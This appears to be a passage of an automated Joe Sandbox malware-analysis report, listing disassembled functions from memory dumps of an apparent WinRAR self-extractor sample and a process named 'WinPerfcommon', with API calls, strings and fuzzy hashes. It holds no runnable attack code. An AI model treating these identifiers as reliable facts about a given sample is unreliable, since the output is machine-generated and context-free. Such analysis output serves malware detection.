                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcschr
                                                                  • String ID: *
                                                                  • API String ID: 2691759472-163128923
                                                                  • Opcode ID: 203da8021a280b251de1601b75ef4c14c66c18db85f8914f836dec797da641ce
                                                                  • Instruction ID: 233c10f795e44fbe45060d0204946ac20381be3e30d580c55d5b36ff08daccd8
                                                                  • Opcode Fuzzy Hash: 203da8021a280b251de1601b75ef4c14c66c18db85f8914f836dec797da641ce
                                                                  • Instruction Fuzzy Hash: 0E3139221043019ACB30AE15890267B73E5EF93B16F15851FFD8857243E76D8D8E93EA
                                                                  Function 0046B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen
                                                                  • String ID: }
                                                                  • API String ID: 176396367-4239843852
                                                                  • Opcode ID: b882be2a8f4c9596b4417551074c564af1f1da2f6441145da79e9c2a9d284eb1
                                                                  • Instruction ID: cf4dbfa8efdd319c52d705c906d3c20d9199266b31b826784b780afd02c99866
                                                                  • Opcode Fuzzy Hash: b882be2a8f4c9596b4417551074c564af1f1da2f6441145da79e9c2a9d284eb1
                                                                  • Instruction Fuzzy Hash: E821D1729043066AD731EA65D845AABB3ECDF81758F40042FF545C3242FB6D9D8883EB
                                                                  Function 0045F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0045F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0045F2E4
                                                                    • Part of subcall function 0045F2C5: GetProcAddress.KERNEL32(004981C8,CryptUnprotectMemory), ref: 0045F2F4
                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,0045F33E), ref: 0045F3D2
                                                                  Strings
                                                                  • CryptProtectMemory failed, xrefs: 0045F389
                                                                  • CryptUnprotectMemory failed, xrefs: 0045F3CA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$CurrentProcess
                                                                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                  • API String ID: 2190909847-396321323
                                                                  • Opcode ID: bddcdc614dc08f39e8dede50841c4c107538ec223b9a60471d6decdfc2b8fb46
                                                                  • Instruction ID: 771d6582388a0024990c7b8919a923434eb3c63a9bd313c9fbfa62ab47f707dc
                                                                  • Opcode Fuzzy Hash: bddcdc614dc08f39e8dede50841c4c107538ec223b9a60471d6decdfc2b8fb46
                                                                  • Instruction Fuzzy Hash: 3D11E131600229ABEF15AF25D846A6E3B54EB01B66B10817BFC419B252DB3C9D0D879E
                                                                  Function 0046101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00010000,00461160,?,00000000,00000000), ref: 00461043
                                                                  • SetThreadPriority.KERNEL32(?,00000000), ref: 0046108A
                                                                    • Part of subcall function 00456C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00456C54
                                                                    • Part of subcall function 00456DCB: _wcschr.LIBVCRUNTIME ref: 00456E0A
                                                                    • Part of subcall function 00456DCB: _wcschr.LIBVCRUNTIME ref: 00456E19
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                  • String ID: CreateThread failed
                                                                  • API String ID: 2706921342-3849766595
                                                                  • Opcode ID: b6035f5aacb36f86a5cd86e5d50d0a348ba99cf9a56a8c6ceb5150fabb13aaef
                                                                  • Instruction ID: 32260f16410688bad821462ba2d67830afe80ff96c47917e893e28aab2b50773
                                                                  • Opcode Fuzzy Hash: b6035f5aacb36f86a5cd86e5d50d0a348ba99cf9a56a8c6ceb5150fabb13aaef
                                                                  • Instruction Fuzzy Hash: 77014E7530430A6FD7306F24DC42B7A7358EB41751F20043FFB42926A1DEA96C85432D
                                                                  Function 0045C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcschr
                                                                  • String ID: <9H$?*<>|"
                                                                  • API String ID: 2691759472-1860354782
                                                                  • Opcode ID: f2b7421f891b29e0088891a0403d84489f3986c5eb583d941953ff606f59a3c9
                                                                  • Instruction ID: 8eeb89696faa748856d16a7c9d690dc58014227d96667fa9fba8063f538c3a0d
                                                                  • Opcode Fuzzy Hash: f2b7421f891b29e0088891a0403d84489f3986c5eb583d941953ff606f59a3c9
                                                                  • Instruction Fuzzy Hash: 62F0D653545301C9C7302EA85841737B3E4DF91B26F34481FE9C4873C3E6AD88C9865D
                                                                  Function 0046DB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen
                                                                  • String ID: Software\WinRAR SFX$F
                                                                  • API String ID: 176396367-620974218
                                                                  • Opcode ID: 1d23f7000b948b4673f05efff3f5bb00af9eec70b0bdb669c09a4d766377f15e
                                                                  • Instruction ID: cdb0c1fd5d4d5c178a063c2fe03a6c6649a90a64e00c73e6982b613fd6eb3efe
                                                                  • Opcode Fuzzy Hash: 1d23f7000b948b4673f05efff3f5bb00af9eec70b0bdb669c09a4d766377f15e
                                                                  • Instruction Fuzzy Hash: 38017131900118BADF21AF52DC09FDB7F7CEF44795F000067B54991060E7B45A98CBE9
                                                                  Function 0046AE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0045C29A: _wcslen.LIBCMT ref: 0045C2A2
                                                                    • Part of subcall function 00461FDD: _wcslen.LIBCMT ref: 00461FE5
                                                                    • Part of subcall function 00461FDD: _wcslen.LIBCMT ref: 00461FF6
                                                                    • Part of subcall function 00461FDD: _wcslen.LIBCMT ref: 00462006
                                                                    • Part of subcall function 00461FDD: _wcslen.LIBCMT ref: 00462014
                                                                    • Part of subcall function 00461FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0045B371,?,?,00000000,?,?,?), ref: 0046202F
                                                                    • Part of subcall function 0046AC04: SetCurrentDirectoryW.KERNELBASE(?,0046AE72,C:\Users\user\Desktop,00000000,0049946A,00000006), ref: 0046AC08
                                                                  • _wcslen.LIBCMT ref: 0046AE8B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$CompareCurrentDirectoryString
                                                                  • String ID: <F$C:\Users\user\Desktop
                                                                  • API String ID: 521417927-3598875323
                                                                  • Opcode ID: ea99ac955b9877f943f3d3b80cbaebbad4dd50a99232e23f6a728c8d0993a9d3
                                                                  • Instruction ID: 8152bf2c5362889a7acc97343d0ee29dc9ae2143e671f738edb50677e6b92ac7
                                                                  • Opcode Fuzzy Hash: ea99ac955b9877f943f3d3b80cbaebbad4dd50a99232e23f6a728c8d0993a9d3
                                                                  • Instruction Fuzzy Hash: C0015271D4021855DF11ABA5DD0AEDF72BCAF08309F00046BF506E3191F6B896548FAA
                                                                  Function 0047BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004797E5: GetLastError.KERNEL32(?,00491030,00474674,00491030,?,?,00473F73,00000050,?,00491030,00000200), ref: 004797E9
                                                                    • Part of subcall function 004797E5: _free.LIBCMT ref: 0047981C
                                                                    • Part of subcall function 004797E5: SetLastError.KERNEL32(00000000,?,00491030,00000200), ref: 0047985D
                                                                    • Part of subcall function 004797E5: _abort.LIBCMT ref: 00479863
                                                                  • _abort.LIBCMT ref: 0047BB80
                                                                  • _free.LIBCMT ref: 0047BBB4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast_abort_free
                                                                  • String ID: pH
                                                                  • API String ID: 289325740-1451419334
                                                                  • Opcode ID: 1c1520466e4f26bc35f56f6b397b257de6924eda45779950c8c4bc9af2f93bdb
                                                                  • Instruction ID: 991b3ecd26670fa6ef0ac9851cd72a055000f9b50fe7e649e9a8eb2c01a8f0ac
                                                                  • Opcode Fuzzy Hash: 1c1520466e4f26bc35f56f6b397b257de6924eda45779950c8c4bc9af2f93bdb
                                                                  • Instruction Fuzzy Hash: FE018E31D016219BCB22AF6AD8012AEB760FB04B24B14851FED6867A95CB2C7D018BCD
                                                                  Function 0046B425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Malloc
                                                                  • String ID: (F$ZF
                                                                  • API String ID: 2696272793-210782626
                                                                  • Opcode ID: 053855ebd2f35403fb42910017ce578806a6d7189fbe934e135d1af2b718630c
                                                                  • Instruction ID: 8ef0da9171d1da951830beb3f363f661d1390a1631c84b6e47ad9d23edbcbf16
                                                                  • Opcode Fuzzy Hash: 053855ebd2f35403fb42910017ce578806a6d7189fbe934e135d1af2b718630c
                                                                  • Instruction Fuzzy Hash: FB0169B6640108FF9F059FB1DC49CEEBBADEF08345700026AF906D7120EB31AA44DBA4
                                                                  Function 00478268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0047BF30: GetEnvironmentStringsW.KERNEL32 ref: 0047BF39
                                                                    • Part of subcall function 0047BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0047BF5C
                                                                    • Part of subcall function 0047BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0047BF82
                                                                    • Part of subcall function 0047BF30: _free.LIBCMT ref: 0047BF95
                                                                    • Part of subcall function 0047BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0047BFA4
                                                                  • _free.LIBCMT ref: 004782AE
                                                                  • _free.LIBCMT ref: 004782B5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                  • String ID: 0"K
                                                                  • API String ID: 400815659-2643911354
                                                                  • Opcode ID: 829f08be957931de4782c047e83b6482fc8e31bbc70693cbd34e9df9a1763f5d
                                                                  • Instruction ID: 3cd8e1c014685eafb7eeb51b7d93044f1fec5c178f34b4fac7336cce0df47191
                                                                  • Opcode Fuzzy Hash: 829f08be957931de4782c047e83b6482fc8e31bbc70693cbd34e9df9a1763f5d
                                                                  • Instruction Fuzzy Hash: 00E0A03268594249A2A5323B2C0A6EB16008B9133DB54829FF918D71C3DE5C880604AF
                                                                  Function 00460FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00461206,?), ref: 00460FEA
                                                                  • GetLastError.KERNEL32(?), ref: 00460FF6
                                                                    • Part of subcall function 00456C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00456C54
                                                                  Strings
                                                                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00460FFF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                  • API String ID: 1091760877-2248577382
                                                                  • Opcode ID: 4c2bbf7cb3b015b6cb45b59d544b36232e77fbbe692b229f1122945e5988c396
                                                                  • Instruction ID: 892079132a5c2396ca432771af07ffb4648384804d5f52f5c77f8d6f513350a7
                                                                  • Opcode Fuzzy Hash: 4c2bbf7cb3b015b6cb45b59d544b36232e77fbbe692b229f1122945e5988c396
                                                                  • Instruction Fuzzy Hash: 0BD02B3160413136CA2137289C06D6F3C048B12733BA10B2EF538516F6CB1D0981539E
                                                                  Function 0045E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,0045DA55,?), ref: 0045E2A3
                                                                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0045DA55,?), ref: 0045E2B1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: FindHandleModuleResource
                                                                  • String ID: RTL
                                                                  • API String ID: 3537982541-834975271
                                                                  • Opcode ID: 652b7cbc6236281e4158740995b845b1052499cdc019027641c6f72ed6e6db90
                                                                  • Instruction ID: 9c43fdb9be9163b7d49edb8d1bac322214ab7d015f83003ee0044965198e61b1
                                                                  • Opcode Fuzzy Hash: 652b7cbc6236281e4158740995b845b1052499cdc019027641c6f72ed6e6db90
                                                                  • Instruction Fuzzy Hash: AEC0123124471066E6342B657C0DB4B6A585B01F13F05085DB541E92D5D6A9C94497A4
                                                                  Function 0046E455 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E467
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: UF$zF
                                                                  • API String ID: 1269201914-4175919442
                                                                  • Opcode ID: 48f9888b768225f141e0b57c3efe528e37d132874e70986150292f6eec6901a5
                                                                  • Instruction ID: 1120317dc96016ca66926d59843b6cd3dd675aa14e38c62a10486238411a8989
                                                                  • Opcode Fuzzy Hash: 48f9888b768225f141e0b57c3efe528e37d132874e70986150292f6eec6901a5
                                                                  • Instruction Fuzzy Hash: 44B012D92990007C310431271D02C3B025CC6C0F11330C43FF600D1086FD4C0E02083F
                                                                  Function 0046E470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E467
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: pF$zF
                                                                  • API String ID: 1269201914-254565063
                                                                  • Opcode ID: 870b5589d40a4c93bdb17955b4d6424b452c917384de7bb00fbfaef6a3efb260
                                                                  • Instruction ID: 57ce3cc6e8b17c8d7a6a86a3023ce9292988947bb1147f035c379447e7e0a9d7
                                                                  • Opcode Fuzzy Hash: 870b5589d40a4c93bdb17955b4d6424b452c917384de7bb00fbfaef6a3efb260
                                                                  • Instruction Fuzzy Hash: 55B012C925A040BC3244B1271C02D3B018CC5C4B51330C43FF804C2081FD4C4C01093F

                                                                  Executed Functions

                                                                  Function 00007FF848F40D48 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 5X_H
                                                                  • API String ID: 0-3241812158
                                                                  • Opcode ID: 3ee324956cdc18e52985d729705f5d24f542cd07b6b610469ce856c5a3e62788
                                                                  • Instruction ID: 30d2220a3d7ede962d506d58835333ce81d8dce59959b5e17346d3a1e8b383f6
                                                                  • Opcode Fuzzy Hash: 3ee324956cdc18e52985d729705f5d24f542cd07b6b610469ce856c5a3e62788
                                                                  • Instruction Fuzzy Hash: 2A91D075D1DA899FE789EB6888293B97FE0FBA6750F0400BBC009D72D2DB791814C751
                                                                  Function 00007FF848F40E43 Relevance: .2, Instructions: 174COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bce981914e56a4366f2e83c415112c588366048c715235c4dfe0d650d9a06a1b
                                                                  • Instruction ID: 0df655171a4afb84a67f67252ca2a2817c5a34390539fc349c1476a4a20fc12d
